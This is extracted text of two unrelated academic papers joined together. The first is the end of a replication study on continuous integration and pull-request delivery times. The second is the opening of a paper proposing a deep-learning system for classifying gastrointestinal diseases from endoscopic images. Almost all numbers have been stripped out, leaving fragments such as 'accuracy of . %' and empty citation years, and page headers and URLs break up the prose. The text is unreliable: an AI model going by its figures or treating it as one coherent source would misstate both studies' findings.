bernardo, da costa guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure bar chart plotting the variables with the highest explanatory power for each project, before (‘‘no-ci’’) and after (‘‘ci’’) ci adoption. only projects for which a regression model with r > . could be trained are considered. full-size doi: . /peerjcs. /fig- & kulesza ( ), we only accept models with r > . as sufficiently accurate. prior to ci adoption, the models for of projects ( . %) have r values higher than . (median of these is . ). after ci adoption, we achieve only valid models ( . %), with a median r value of . . this is in line with our previous findings, and indicates that pr delivery time is in general rather unpredictable, and unlikely to depend on any single factor. figure depicts for how many projects (among those for which a model with r > . could be found) each variable is the one with the highest explanatory power, as measured through the wald x maximum likelihood test. our newly proposed variable ‘‘come-in time’’ indeed outperforms all variables from the original study. this further supports that the factor most important to the end-to-end delivery time of a pr is whether it has been merged close in time to the next release. it is also noticable that all variables related to the nature of the pr or the contributor are less relevant than process- and project-oriented metrics, such as when a pr comes in, which position in the merge queue it has, or how large the merge workload currently is. it needs to be noted that there is a high correlation between the new metric ‘‘come-in time’’ and ‘‘queue rank’’, one of the metrics in the original study, in a subset of the projects. namely, in of projects ( %) the correlation between these metrics is larger than . prior to introducing ci, and in of projects ( %) after ci introduction. for the remaining projects, there is a correlation between these metrics, but it is less pronounced. guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. box . summary and lessons learned. applying rdd to the original data set primarily revealed that two of the three ana- lyzed metrics (dd and pl) follow very clear patterns, namely that they depend to a large degree on the time until the next release. consequently, when in the release cycle a pr is merged is the best predictor of delivery time (pl). the merge delay md does not follow such a pattern. we did not observe in any project that md would trend up- or downwards independently of ci adoption, alleviating our original concern with the original study. however, our experiments also confirm the result from the original study that the delivery time is generally difficult to predict, as indicated by the low r metric of the regression models of most projects. rq –generalizability so far, we have applied all analyses to the data set also used in the original study. now we turn towards evaluating whether the previous findings are specific to the used data. analysing new data (rq . ) in a first step, we evaluate the generalizability of our findings by collecting new projects (which have also adopted ci), and conducting the same analyses as presented in ‘rq —exact replication’ and ‘rq —conceptual replication’. we firstly again evaluate how many projects improved dd, md, and pl, and used a mww test to evaluate statistical significance. the results of this analysis are provided in table , which also provides our own results from rq as a point of comparison. we observe that the results are not fundamentally different, although we observe to percent points difference in selected results (particularly related to the delivery delay dd). effect sizes are small, as also observed for the original data. a replication of our analysis of submitted, accepted, and released prs confirms our findings that projects statistically significantly increase their development activities after adopting ci (with medium effect size), but we can again not find a statistically significant change in the number of releases. finally, the re-execution of rdd (rq . ) on the new data yields similarly comparable results. a deeper discussion of this aspect is omitted here for reasons of brevity, but can be found in guo ( ). an interesting result is found when fitting regression models, as discussed for rq . , to the new data. for projects, only models ( . %) trained on data after ci adoption and models ( . %) for data before ci adoption achieve an r metric higher than . . it remains unclear why the regression approach works even less well on the new than on the original data. however, given that r values were generally low even for the original data, this result may ultimately just stress that predicting delivery times is difficult at the best of times. analysing a control group (rq . ) so far, we have experimented only with projects that actually adopted ci at some point in the project’s lifetime. we now turn towards analysing our control group of comparable guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table results of a re-analysis using a new data set. faster with ci [% of projects] stat. different [% of projects] dd original data . % . % new data % % difference . . md original data . % . % new data . % . % difference . . pl original data . % . % new data . % . % difference . . table results of a re-analysis using a control group of projects which never introduced ci. faster with ci [% of projects] stat. different [% of projects] dd original data . % . % control data . % . % difference . . md original data . % . % control data % . % difference . . pl original data . % . % new data % . % difference . . projects which, as far as we can observe, have never adopted ci. one challenge in this context is what point in the project’s history to use as cutoff for analysis. from analysing the projects in the original data set, we learn that these projects, on average, introduce ci after . % of the lifetime of the project in days (median %, variance . ). hence, we decide to introduce a ‘‘mock-ci-timepoint’’ for the projects in the control group that corresponds to % of their lifetime. intuitively, this is the point in time when these projects would have, on average, adopted ci (if they ever did). a comparison of the results achieved for this control group with the results achieved for the original data set is provided in table . note that in this case ‘‘faster with ci’’ for the control group should be interpreted as ‘‘faster after the mock-ci-timepoint’’ of %. the results of this analysis indicate that we do observe (slightly) larger differences between the original test group and the control group than what we have observed for the two different test groups in rq . (cp. table ). this supports the conclusion that the introduction of ci has some modest impact on these numbers. however, when analyzing the number of submitted, merged, and released prs, we observe that there is no difference between before and after the (mocked) ci introduction. this is visualized in fig. . statistical testing does not reveal any differences before and after the mocked ci introduction for any metric. guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure comparison of merged and released prs per release before and after ci inroduction for a control group of projects that never introduced ci. (a) #submitted prs/release; (b) #merged prs/re- lease; (c) #delivered prs/release; (d) #release/year. full-size doi: . /peerjcs. /fig- hence, we support the argument by bernardo, da costa & kulesza ( ) that the introduction of ci seems to have a (minor) impact on pr delivery time of projects. however, projects in both test groups manage to handle considerably more prs per release after ci adoption, while we have not observed any statistically significant increase in the control group. hence, we conclude that projects do not so much speed up handling individual prs, but rather manage to handle considerably more prs per release after adopting ci. box . summary and lessons learned. applying our analyses to new data sets allowed us to evaluate to what extent the ef- fects observed so far are due to specifics of the data collected by bernardo, da costa & kulesza ( ). when analyzing a new data set collected using the same methodology, we have observed results that are in the broad strokes similar to the original findings, although we have observed differences up to percentage points for individual met- rics. when analyzing a control group of projects that never adopted ci, we found re- sults not unlike to the results of the new test group, indicating that the small size ef- fects we observed in rq may be independent of ci introduction. however, we have observed that both test groups handle more prs after ci adoption with medium ef- fect size, while we have not observed a statistically significant increase for the control group. this leads us to believe that projects may not actually handle individual prs guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. (much) faster after ci adoption, but they are able to handle considerably more prs per release. threats to validity this section addresses potential threats to the validity of our replication and overall results. construct validity construct validity describes threats related to the design of the study. to a large degree, we have chosen the same data collection procedures, statistical methods, and analysis techniques that were already present in the original study. this was done by design, so as to keep our replication easily comparable to the original study. however, this also means that any limitations inherent in the original study design are still present in our replication (with the exception of those that we explicitly chose to address as part of our conceptual replication). for the construction of our control group, there are two related threats. ( ) even though we carefully attempted to determine whether a candidate project for the control group does indeed not use any ci system, it is not always feasible to determine this from an outsider’s point of view (e.g., a company-backed oss project may use a ci system within the company, which is not mentioned on the github page). ( ) even though we attempted to keep the control group as similar in characteristics to the original study objects as possible, the mere fact that these projects have chosen to not adopt ci may already hint at deeper differences in mindsets, processes, and project goals than what is visible from github metrics alone. these differences may also account for some of the different results we have observed. further, our control group is considerably smaller than the original data set ( versus projects). external validity external validity concerns to what extent the findings of the study still hold under in more generalized circumstances. part of our replication was specifically to investigate a data set of new projects which adopted ci, and projects which are not using ci. however, we used the same data collection procedure and sampling methods to select these projects. hence, our replication does not aim to, and cannot, answer the question if the observed results are specific to oss software, to high-profile projects, or to projects written in the java, python, php, ruby, or javascript programming languages. further, it should be noted that we only consider projects that make use of travis-ci. hence, it remains an open question to what extent our results also generalize to projects using other ci systems, such as gitlab https://about.gitlab.com or jenkins https://jenkins.io. internal validity internal validity questions to what extent the study is able to draw correct conclusions, and does not fall prey to, for instance, confounding factors. one of the key motivations of our replication was to evaluate whether normal changes in projects over the lifetime of the project may be responsible for the effects observed in the original study. this concern was alleviated in our replication. however, other confounding factors may still remain relevant. particularly concerning in this regard is that our evaluation of a control group of projects that never applied ci has shown results that, ultimately, were not fundamentally different than what we observed for a new data set of ci-using projects. guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://about.gitlab.com https://jenkins.io http://dx.doi.org/ . /peerj-cs. hence, we see the need for more work to fully establish the effects of adopting ci in oss projects. conclusions in this work, we replicated an original study by bernardo, da costa & kulesza ( ) that attempted to answer the question whether oss projects deliver prs faster after adopting ci. our replication was motivated by limitations in the original study design, which did not account for changes in pr delivery time independent of ci introduction. we conducted an exact replication of the original work, analyzed the original data using a different statistical procedure (rdd), and extended the original multiple regression model using a new variable (‘‘come-in time’’). further, we analyze two new data sets, a new set of study subjects that adopted ci and a control group of projects that did not. we were able to replicate the original findings. our analysis using rdd has not shown any evidence of growth of pr delivery times independent of ci introduction, and our analysis of control group data has revealed that projects which never adopted ci do not see the same increase in submitted, merged, and released prs as seen for ci-using projects. however, our study also confirms that the impact of ci on the delivery time for an individual pr is only minor. this is in line with the original study, which has also reported primarily small statistical effect sizes. we further find that, before as well as after ci adoption, the best predictor of pr delivery times is when in the release cycle a pr is merged. this indicates that, ultimately, projects need to increase the number of releases to speed up pr delivery times rather than adopt ci. however, the number of releases appears to be largely independent of whether or not a project adopts ci. acknowledgements this work has been conducted as a master project while the first author was a student at chalmers university of technology. additional information and declarations funding this work has received financial support by the swedish research council vr under grant number - (developer-targeted performance engineering for immersed release and software engineers). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: swedish research council vr under grant number - (developer-targeted performance engineering for immersed release and software engineers). competing interests philipp leitner is an academic editor for peerj computer science. guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. author contributions • yunfang guo conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • philipp leitner conceived and designed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: all data is available on github: https://github.com/radialine/do-open-source- projects-deliver-pull-requests-faster-using-ci. references bacchelli a, bird c. . expectations, outcomes, and challenges of modern code review, icse ’ . in: proceedings of the international conference on software engineering. piscataway: ieee press. basili vr, shull f, lanubile f. . building knowledge through families of experi- ments. ieee transactions on software engineering ( ): – doi . / . . bernardo jah, da costa da, kulesza u. . studying the impact of adopting continuous integration on the delivery time of pull requests. new york: acm, – doi . / . . duvall pm, matyas s, glover a. . continuous integration: improving software quality and reducing risk. london: pearson education. gousios g, pinzger m, van deursen a. . an exploratory study of the pull-based software development model. in: icse proceedings of the th international conference on software engineering. – . guo y. . the impact of adopting continuous integration on the delivery time of pull requests—a partial replication and extension. gothenburg, sweden: department of computer science and engineering, chalmers university of gothenburg. hilton m, tunnell t, huang k, marinov d, dig d. . usage, costs, and benefits of continuous integration in open-source projects. in: proceedings of the st ieee/acm international conference on automated software engineering. piscataway: ieee, – . imbens gw, lemieux t. . regression discontinuity designs: a guide to practice. journal of econometrics ( ): – doi . /j.jeconom. . . . juristo n, gómez os. . replication of software engineering experiments. in: empirical software engineering and verification. springer-verlag berlin/heidelberg: international summer schools, laser – , – . laukkanen e, paasivaara m, arvonen t. . stakeholder perceptions of the adoption of continuous integration–a case study. in: agile conference. piscataway: ieee, – . guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/radialine/do-open-source-projects-deliver-pull-requests-faster-using-ci https://github.com/radialine/do-open-source-projects-deliver-pull-requests-faster-using-ci http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /j.jeconom. . . http://dx.doi.org/ . /peerj-cs. manglaviti m, coronado-montoya e, gallaba k, mcintosh s. . an empirical study of the personnel overhead of continuous integration. in: msr ’ proceedings of the th international conference on mining software repositories. – . mcintosh s, kamei y, adams b, hassan ae. . the impact of code review coverage and code review participation on software quality: a case study of the qt, vtk, and itk projects. in: proceedings of the th working conference on mining software repositories, msr . new york: acm, – doi . / . . miller a. . a hundred days of continuous integration. in: agile conference. parsons d, ryu h, lal r. . the impact of methods and techniques on outcomes from agile software development projects. in: organizational dynamics of technology- based innovation: diversifying the research agenda. – . romano j, kromrey j, coraggio j, skowronek j. . appropriate statistics for ordinal level data: should we really be using t-test and cohensd for evaluating group differ- ences on the nsse and other surveys? in: annual meeting of the florida association of institutional research. shepperd m. . replication studies considered harmful. in: proceedings of the th international conference on software engineering: new ideas and emerging results, icse- nier ’ . new york: acm, – doi . / . . shull f, basili v, carver j, maldonado jc, travassos gh, mendona m, fabbri s. . replicating software engineering experiments-addressing the tacit knowledge problem. in: proceedings international symposium on empirical software engineering. . shull fj, carver jc, vegas s, juristo n. . the role of replications in empirical software engineering. empirical software engineering ( ): – doi . /s - - - . stolberg s. . enabling agile testing through continuous integration. in: agile conference. ståhl d, bosch j. . modeling continuous integration practice differences in industry software development. journal of systems and software : – . thistlethwaite dl, campbell dt. . regression-discontinuity analysis: an alternative to the ex post facto experiment. journal of educational psychology ( ): – doi . /h . vasilescu b, schuylenburg sv, wulms j, serebrenik a, van den brand mg. . continuous integration in a social-coding world: empirical evidence from github. in: software maintenance and evolution (icsme), ieee international conference on ieee. piscataway: ieee. vasilescu b, yu y, wang h, devanbu p, filkov v. . quality and productivity outcomes relating to continuous integration in github. in: proceedings of the th joint meeting on foundations of software engineering - esec/fse . yu y, wang h, filkov v, devanbu p, vasilescu b. . wait for it: determinants of pull request evaluation latency on github. in: ieee/acm th working conference on mining software repositories. piscataway: ieee. guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /h http://dx.doi.org/ . /peerj-cs. yu y, yin g, wang t, yang c, wang h. . determinants of pull-based development in the context of continuous integration. science china information sciences : doi . /s - - - . zhao y, serebrenik a, zhou y, filkov v, vasilescu b. . the impact of continuous integration on other software development practices: a large-scale empirical study. in: proceedings of the nd ieee/acm international conference on automated software engineering. piscataway: ieee, . guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. gastro-cadx: a three stages framework for diagnosing gastrointestinal diseases gastro-cadx: a three stages framework for diagnosing gastrointestinal diseases omneya attallah and maha sharkas department of electronics and communication engineering, college of engineering and technology, arab academy for science, technology and maritime transport, alexandria, egypt abstract gastrointestinal (gi) diseases are common illnesses that affect the gi tract. diagnosing these gi diseases is quite expensive, complicated, and challenging. a computer-aided diagnosis (cadx) system based on deep learning (dl) techniques could considerably lower the examination cost processes and increase the speed and quality of diagnosis. therefore, this article proposes a cadx system called gastro-cadx to classify several gi diseases using dl techniques. gastro-cadx involves three progressive stages. initially, four different cnns are used as feature extractors to extract spatial features. most of the related work based on dl approaches extracted spatial features only. however, in the following phase of gastro-cadx, features extracted in the first stage are applied to the discrete wavelet transform (dwt) and the discrete cosine transform (dct). dct and dwt are used to extract temporal-frequency and spatial-frequency features. additionally, a feature reduction procedure is performed in this stage. finally, in the third stage of the gastro-cadx, several combinations of features are fused in a concatenated manner to inspect the effect of feature combination on the output results of the cadx and select the best-fused feature set. two datasets referred to as dataset i and ii are utilized to evaluate the performance of gastro-cadx. results indicated that gastro-cadx has achieved an accuracy of . % and . % for dataset i and ii respectively. the results were compared with recent related works. the comparison showed that the proposed approach is capable of classifying gi diseases with higher accuracy compared to other work. thus, it can be used to reduce medical complications, death-rates, in addition to the cost of treatment. it can also help gastroenterologists in producing more accurate diagnosis while lowering inspection time. subjects bioinformatics, artificial intelligence, computer vision, data mining and machine learning keywords gastrointestinal (gi) diseases, deep learning, convolution neural network, computer aided diagnosis introduction gastrointestinal (gi) disease is considered one of the supreme common diseases that usually infect people, causing complicated health conditions (du et al., ). based on the degree of injury, gi can approximately split into the precancerous lesion, primary gi cancer and progressive gi cancer, and benign gi diseases (sharif et al., ). among benign gi diseases are ulcers, gastritis, and bleedings which will not depreciate into cancers in short term. in contrast, precancerous gi injury could depreciate into primary gi cancer how to cite this article attallah o, sharkas m. . gastro-cadx: a three stages framework for diagnosing gastrointestinal diseases. peerj comput. sci. :e doi . /peerj-cs. submitted november accepted february published march corresponding author omneya attallah, o.attallah@aast.edu academic editor robertas damaševičius additional information and declarations can be found on page doi . /peerj-cs. copyright attallah and sharkas distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:o.�attallah@�aast.�edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ or even progressive gi cancer, in case it was not accurately diagnosed and treated in time (du et al., ). annually almost . million patients are diagnosed with gastric cancer. since , , new gi diseases arose in america. a global survey indicated that since , , deaths occurred due to stomach cancer, , deaths are due to colon cancer. the poorest situations can be detected in the developing countries (e.g., the asian countries and the middle east) (ali et al., ; khan et al., a). moreover, among people diseased with gi diseases, % of them are from china, % from brazil, % from russia, % of eu, and % of the us (sharif et al., ). the early diagnosis of gi is essential to reduce medical complications, cost of treatment, and lower death rates. the traditional clinical method used for gi diagnosis is the intestinal biopsy of the gi tract. these biopsy samples are analyzed by medical experts using microscopes to examine the possibility of any cancerous or abnormal cells’ existence. the drawbacks of such a method are being invasive and the necessity of a high degree of proficiency (ali et al., ). in contrast, endoscopic imaging is a lower invasive technique for visualizing the gi tract (kainuma et al., ). the endoscopic process assists the doctor in the recognition and diagnosis of gastric anomalies in their initial stages. timely detection and diagnosis of chronic medical conditions can be healed with appropriate treatments. hence, the imaging procedure can be very beneficial for a considerable decrease in medical complications, the cost of treatment, and death-rates, especially, the deaths that happen due to several gi cancers, which could be treated if cancer was discovered in its pre-malignant phase (hamashima et al., ). although there are numerous advantages in endoscopy, it brings along with it particular trade-offs; for example, the huge number of video frames produced during the screening process of the gi tract. on average, the entire process can take from min to h depending on the aimed gi region and the expertise of the gastroenterologist (ali et al., ). the number of generated frames can reach up to , images. most of these frames are redundant and not valuable and only a few images might have some abnormal lesions (khan et al., b). all these redundant images can be removed by examining each frame of the endoscopic video. therefore, the manual examination of diseases through such a huge number of images is very challenging as it needs an extensive amount of time to observe the complete number of frames. besides, at times the anomalous frames can be simply unnoticed by the gastroenterologist which can cause misdiagnosis. therefore, such medical experts request automated schemes, that can automatically determine possible malignancies by analyzing the entire endoscopic images (aoki et al., ). computer-aided diagnosis (cadx) are systems utilized for automatic diagnosis of several diseases within various parts of the human body like the brain (attallah, sharkas & gadelkarim, , ), breast (ragab, sharkas & attallah, ), lung (attallah, ragab & sharkas, ), etc. along with these diseases, cadx has been commonly used to diagnose gi disease in the intense by analyzing endoscopic images (khan et al., b). such cadx has several advantages from which the patients, gastroenterologists, and medical students can benefit. these include; the reduction in the examination time of the whole endoscopic frames. besides, the decrease in the cost of treatment as the lesion will be detected in an early phase. moreover, cadx will improve the accuracy of the attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ diagnosis of gi diseases compared to manual examination. also the inspection time from endoscopic images is to be decreased. furthermore, it may be used for training medical staff and students without the necessity of an expert (ali et al., ). in a cadx scheme, the diagnosis is carried out using each frame depending on the significant features taken out from the image. thus, feature extraction is the key step in an accurate diagnosis of medical conditions (attallah, ) like gi diseases (khan et al., b; ali et al., ; khan et al., ). several features are calculated using handcrafted techniques in the literature like color-based, texture-based, and some others (khan et al., b; ali et al., ). karargyris & bourbakis ( ) utilized geometric and texture features extracted from susan edge detector and gabor filter extraction methods to detect small bowel polyps and ulcers. on the other hand, li & meng ( a) used the uniform local binary pattern (lbp) and discrete wavelet transform (dwt). they employed an svm classifier to detect abnormal tissues. in the same way, the authors in li & meng ( b) detected tumors in the intestine using dwt and lbp. instead, yuan & meng ( ) fuzed the saliency map with the bag of features (bof) technique to identify polyps in endoscopic images. initially, the authors employed the bof method to describe the local features by using a scale-invariant feature transform (sift) feature vectors using k-means clustering. next, the saliency map histogram method was utilized to extract salience features. lastly, both features are combined and utilized to learn an svm classifier. later the same authors (yuan, li & meng, ) added the complete lbp (clbp), lbp, uniform lbp (ulbp), and histogram of oriented gradients (hog) features along with sift features to extract additional distinctive texture features. alternatively, color-based features were extracted in (ghosh, fattah & wahid, ; deeba et al., ) for bleeding detection. recently, the advancement of deep learning (dl) methods has delivered new opportunities to improve the analysis of endoscopic images. cnns are the most type of networks used in endoscopy (alaskar et al., ). these networks can be used as classifiers or/and feature extractors. feature extraction methods based on dl techniques have been extensively utilized in the literature (ghatwary, zolgharni & ye, ; kim, cho & cho, ; lee et al., ). the authors of khan et al. ( a) proposed a cadx system to detect ulcers and bleeding gi diseases. their system extracted deep features from two different layers of vgg- cnn. afterward, these features were fused, and then significant features were selected using an evolutionary search method called pso. these features were then used to train the svm classifier. igarashi et al. ( ) proposed a cadx framework to classify several gi diseases using alexnet. first, alexnet extracted spatial features and then classified them into different diseases. the authors of alaskar et al. ( ) proposed a dl-based cadx that utilized alexnet and googlenet for ulcer detection from low contrast endoscopic videos (wev). features extracted from these networks were classified using the fully connected layer of each network separately. alexnet was also used in (fan et al., ) to detect both erosions and ulcers that are observed in the intestine. he et al. ( ) introduced a framework based on two cascaded cnns. the first network is vgg- cnn which was used for edge detection, whereas the second is the inception cnn which was used for classification. similarly, attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ khan et al. ( b) used two cnns, the first one is recurrent cnn for segmentation, whereas, the second was resnet and was used for classification. the authors in yuan & meng ( ) suggested the use of an image manifold with stacked sparse auto-encoder to recognize polyps in endoscopic images. instead, the authors in pei et al. ( ) proposed a cadx system to recognize and assess the small bowel using features extracted from long short-term memory (lstm). other research articles suggested the fusion of handcrafted features and dl features. sharif et al. ( ) proposed a cadx system for classifying gi infections. the authors extracted deep features from vgg- and vgg- cnns and fused these features with some geometric features. these fused features were then used as input to a k-nearest neighbors (knn) classifier. another system was presented in ghatwary, ye & zolgharni ( ) to detect esophageal cancer. the system fuzed gabor features and faster region-based cnn (faster r-cnn). on the other hand, billah, waheed & rahman ( ) fuzed the color wavelet features and cnn features for detecting polyps. the combined features were used later to fed an svm classifier. the authors in nadeem et al. ( ) combined features extracted from textural analysis methods such as haralick and lbp along with vgg- cnn dl features. the authors used logistic regression for classification. the authors of majid et al. ( ) introduced a framework that combined the dct, dwt, color-based statistical features, and vgg dl features for the recognition of several gi diseases. the authors used a genetic algorithm (ga) to select features using the knn fitness function. finally, the selected features were used to train an ensemble classifier. a summary of recent related work along with their limitations is shown in table . the main aim of this work is to construct a cadx called gastro-cadx that is capable of accurately diagnosing more gi diseases than the proposed by others. though there are various approaches to gi detection and classification in the literature, there exist some weaknesses among these methods which are summarized in table. gastro-cadx tries to overcome the limitations found in related studies discussed in table through three cascaded stages. first of all, the majority of the current methods studied the detection and classification of a few types of gi anomalies, disease, or anatomical landmark. but, our proposed gastro-cadx is an automatic highly accurate system to classify several gi diseases and anatomical landmarks. some of the related studies are based on small dataset or used only one dataset to test the efficiency of their classification model, while gastro-cadx is validated using two large datasets of several gi diseases. the few articles that classified several gi diseases achieved low accuracy, not reliable, or used only one type of cnn, whereas, gastro-cadx is an accurate and reliable system that used more four cnns. this article in the first stage, gastro-cadx studies several cnn based methods for feature extraction from spatial domain instead of using one or two networks to benefit from the advantages of several types of cnns. the previous studies were either based only on an end-to-end deep learning which has very high computational cost, used only spatial features extracted from cnns or only handcrafted feature extractions, but gastro-cadx is not based only on spatial features, but temporal-frequency and spatial-frequency features using handcrafted feature extraction methods as well not only attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table a summary of recent related studies. article purpose class method accuracy (%) limitation khan et al. ( b) ulcer, polyp, bleeding detection rcnn, resnet , and svm . � used only spatial features. � low segmentation accuracy for the ulcer regions. � fail for the segmentation of polyp and bleeding regions. khan et al. ( a) ulcer, and bleeding detection vgg- , pso, and svm . � limited classes � used only spatial features. � high computational cost igarashi et al. ( ) classify several gi diseases alexnet . � used only spatial features. � the training or test data included chosen images of gastric cancer lesions, which could cause a selection bias. � has high computational cost � cannot be used in real-time examinations alaskar et al. ( ) ulcer detection alexnet & google net . � limited classes. � used only spatial features owais et al. ( ) classification of multiple gi diseases resnet- and lstm . � high computational cost. � used individual type of features � low accuracy fan et al. ( ) ulcer and erosion detection alexnet . . � limited classes. � used only spatial features. � used only one type of cnn features � the cadx was applied separately for ulcer and erosion detection he et al. ( ) hookworm detection vgg- and inception . � limited classes. � used only spatial features � low accuracy yuan & meng ( ) polyps detection stacked sparse auto-encoder with image manifold � limited classes. � used only spatial features pei et al. ( ) bowel detection and assessment lstm and pca . � limited classes. � used only temporal features. � used only one type of cnn features � low accuracy � small dataset (continued) attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ end-to-end based dl. this appears clearly in the second stage of gastro-cadx. it extracts handcrafted features based on textural analysis from the temporal-frequency and spatial-temporal domains using the dl features extracted in the first stage. this reduces the high computational cost of end-to-end dl techniques. previous related studies indicated that cnn representations have improved the performance and the abstract level for the automatic detection and classification of gi diseases (majid et al., ; khan et al., b; yuan & meng, ). nevertheless, the fusion of cnn features with handcrafted variables could enhance diagnostic accuracy (majid et al., ; table (continued). article purpose class method accuracy (%) limitation sharif et al. ( ) ulcer, and bleeding detection vgg- , vgg- , geometric features, knn . � limited classes. � small dataset. � used spatial and geometric features only ghatwary, ye & zolgharni ( ) esophageal cancer detection gabor filter. faster r-cnn, and svm � limited classes. � used only one type of cnn features � used spatial and textural based -gabor features only. � high computational cost billah, waheed & rahman ( ) polyps detection color based dwt, cnn, and svm . � limited classes. � used only one type of cnn features � used spatial and color based –dwt only � small dataset nadeem et al. ( ) classification of several gi diseases vgg- , haralick and lbp texture analysis, and logistic regression � low accuracy � used only one type of cnn features � used spatial features based on cnn and textural analysis only majid et al. ( ) bleeding, esophagitis, polyp, and ulcerative- colitis classification dct, color based statistical features, dwt, vgg- , ga, and e . � high computational cost. � used only one type of cnn dl features nguyen et al. ( ) classifying images to normal and abnormal densenet, inception, and vgg- . � classify images to either normal or abnormal. � did not classify several gi diseases. � low accuracy owais et al. ( ) classification of multiple gi diseases densenet and lstm . � high computational cost. � used individual type of features attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ shi et al., ). therefore, in the third stage, a fusion process is introduced which combines the second stage features to benefit from the spatial, temporal- frequency, and spatial-frequency features. this stage can confirm the capacity of every feature abstraction method to mine significant information that might be disregarded from the other method. it can also reduce the computational cost compared to end-to-end dl methods. the previous contributions are summarized to: � proposing an automatic and accurate cadx system called gastro-cadx based on three stages to classify several gi diseases and anatomical landmarks. � the system is not based only on spatial features, but temporal-frequency and spatial-frequency features using handcrafted feature extraction methods as well. � in the first stage, gastro-cadx studies several cnn based methods for feature extraction from spatial domain instead of using one or two networks to benefit from the advantages of several types of cnns. � in the second stage, gatro-cadx extracts handcrafted features based on textural analysis from the temporal-frequency and spatial-temporal domains using the dl features extracted in the first stage. � also, in the second stage, gastro-cadx tries to minimize the problem of computational time using only reduced dimensions of features. � in the third stage, a fusion process is introduced which combines the second stage features to benefit from the spatial, temporal-frequency, and spatial-frequency features. � the third stage can confirm the capacity of every feature abstraction method to mine significant information that might be disregarded from the other method. � gastro-cadx is validated using two large datasets of several gi diseases. � creating an accurate automatic diagnostic system that is reliable compared to related cadx systems. materials and methods dataset description this article employs two datasets to evaluate the performance of gastro-cadx. the first dataset used in this article is called kvasir (pogorelov et al., ), and denoted as dataset i. it consists of , images containing eight different gi classes. three classes demonstrating anatomical landmarks, three demonstrating pathological states, and two associated with lesion-removal. the three anatomical landmark categories are pylorus, z-line, and cecum. the three diseased states are esophagitis, polyps, and ulcerative colitis. the two classes associated with lesion removal are dyed lifted polyps and dyed resection margins. the images are of different sizes from × up to , × , pixels. some of these images include a green region illustrating the location and shape of the endoscope within the intestine. this information may be significant for later investigations (thus included) but must be wielded with care for the detection of the endoscopic findings. figure shows different image samples of different gi diseases. attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the second dataset is called hyperkvasir (borgli et al., ) and named dataset ii. the images and videos of this dataset were acquired using standard endoscopy equipment from olympus (olympus europe, hamburg, germany) and pentax (pentax medical europe, hamburg, germany) at a norwegian hospital from to . the dataset consists of , labeled images and classes. these classes are unbalanced; therefore, we chose only balanced classes to construct gastro-cadx. four classes demonstrating anatomical landmarks, three demonstrating pathological states, one demonstrating quality of mucosal views, and two associated with lesion-removal. the three anatomical landmark categories are pylorus, z-line, pylorus, and cecum. the three pathological states are esophagitis, polyps, and ulcerative colitis. the two classes associated with lesion removal are dyed lifted polyps and dyed resection margins. the one demonstrating the quality of mucosal views is bowel quality. figure shows samples of images included in the dataset. deep convolutional neural networks architectures the popular type of dl approaches that is generally utilized for solving image-related classification problems in the health informatics field is the convolutional neural network (cnn) (jin et al., ). in this article, four cnns are utilized including; alexnet, resnet- , darknet- , and densenet- constructions. as it can be noticed from table that most related studies used alexnet, resnet and vgg cnns. we did not use vgg as it has very high computational cost and number of parameters. also, the features extracted from this network is of very huge size (bi et al., ; ertosun & rubin, ; su et al., ). although, alexnet is one of the oldest architectures, but it is still being used due to its acceptable performance. this is because it has efficient computation ability and figure image samples of kasvir dataset: (a) dyed-lifted-polyp, (b) dyed-resection-margin, (c) esophagitis, (d) normal-z-line, (e and f) normal-cecum, polyps, (g) normal-pylorus, and (h) ulcerative-colitis. image credit: michael riegler. full-size doi: . /peerj-cs. /fig- attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ performs well with color images like these used in this article well (wang, xu & han, ). we employed more recent cnns like darknet and densenet architectures. to our own knowledge darknet was not used in the literature, whereas, only few articles used densenet for classifying gi diseases but has several drawbacks in their proposed 